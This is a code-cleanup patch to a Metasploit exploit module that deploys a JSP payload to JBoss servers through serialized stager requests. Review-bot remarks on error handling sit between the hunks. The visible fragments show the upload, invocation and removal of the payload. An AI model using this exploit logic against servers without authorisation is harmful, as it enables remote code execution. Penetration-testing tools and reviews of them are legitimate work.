From b003d8f750b46df8d119f31df77b8960f25e752a Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 22 Jan 2015 18:17:14 -0600
Subject: [PATCH] Do final cleanup
---
 .../multi/http/jboss_invoke_deploy.rb | 22 +++++++------------
 1 file changed, 8 insertions(+), 14 deletions(-)
diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb
index 88dc8abfd5..e83daa567b 100644
--- a/modules/exploits/multi/http/jboss_invoke_deploy.rb
+++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb
@@ -121,7 +121,6 @@ class Metasploit4 < Msf::Exploit::Remote
 print_status("Using manually select target: \"#{mytarget.name}\"") end - # We use a already serialized stager to deploy the final payload regex_stager_app_base = rand_text_alpha(14) regex_stager_jsp_name = rand_text_alpha(14)
@@ -161,7 +160,7 @@ class Metasploit4 < Msf::Exploit::Remote
 name_parameter => app_base,
 content_parameter => b64_war
 }
- }, 20)
+ })
 payload_uri = "/#{app_base}/#{jsp_name}.jsp"
 print_status("Calling payload: " + payload_uri)
@@ -170,9 +169,7 @@ class Metasploit4 < Msf::Exploit::Remote
 # Remove the payload through stager
 print_status("Removing payload through stager")
 delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
- res = send_request_cgi(
- {'uri' => delete_payload_uri,
- })
+ res = send_request_cgi({'uri' => delete_payload_uri})
 # Remove the stager
 print_status("Removing stager")
@@ -225,14 +222,11 @@ catch(Exception e) {}
 %>
 EOT
- # The script must be exactly 810 characters long, otherwise we might have serialization issues
- # Therefore we fill the rest wit spaces
- spaces = " " * (810 - stager_script.length)
- stager_script << spaces
 end
 def send_serialized_request(file_name , replace_params = {})
+ data = ''
 case file_name
 when 'version.bin'
 data = build_get_version.encode
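Review bot: In the hunk at -170,9 the response stored by `res = send_request_cgi({'uri' => delete_payload_uri})` is not inspected in the visible lines, which go straight on to the "Remove the stager" step. If that request times out or is rejected, the deployed application stays on the tested server and the operator gets no message about it. The method continues outside the hunk, so `res` may be checked further down. If it is not, I would add `print_warning("Payload #{app_base} may not have been removed, check the server manually") unless res && res.code == 200` directly after the call.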
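Review bot: In the hunk at -225,14 the new `data = ''` ahead of `case file_name` means an unrecognised `file_name` produces an empty request body instead of an error, so a misspelled template name in a caller would pass unnoticed. The `case` runs past the end of the hunk and may already have an `else` branch. If it does not, an explicit `else raise ArgumentError, "unknown serialized request: #{file_name}"` would surface the mistake at the call site. A short comment on `data = ''` saying why the default is needed would also help the next reader.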
@@ -286,7 +280,7 @@ EOT
 # JBoss might need some time for the deployment. Try 5 times at most and
 # wait 5 seconds inbetween tries
 num_attempts.times do |attempt|
- if (verb == "POST")
+ if verb == "POST"
 res = send_request_cgi(
 {
 'uri' => uri,
@@ -303,16 +297,16 @@ EOT
 end
 msg = nil
- if (!res)
+ if res.nil?
 msg = "Execution failed on #{uri} [No Response]"
- elsif (res.code < 200 or res.code >= 300)
+ elsif res.code < 200 || res.code >= 300
 msg = "http request failed to #{uri} [#{res.code}]"
- elsif (res.code == 200)
+ elsif res.code == 200
 print_status("Successfully called '#{uri}'") if datastore['VERBOSE']
 return res
 end
- if (attempt < num_attempts - 1)
+ if attempt < num_attempts - 1
 msg << ", retrying in 5 seconds..."
 print_status(msg) if datastore['VERBOSE']
 select(nil, nil, nil, 5)
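Review bot: In the hunk at -303,16 a 2xx status other than 200 (201, 204 and so on) matches none of the three branches, so `msg` is still `nil` when `msg << ", retrying in 5 seconds..."` runs and the loop raises NoMethodError instead of retrying. The cleanup keeps this behaviour from the old code. Making the last branch a plain `else` would treat every 2xx as success, or `msg = "Unexpected response from #{uri} [#{res.code}]"` could be set as a fallback before the append. The enclosing method starts and ends outside the hunk, so the handling after the final attempt is not visible here.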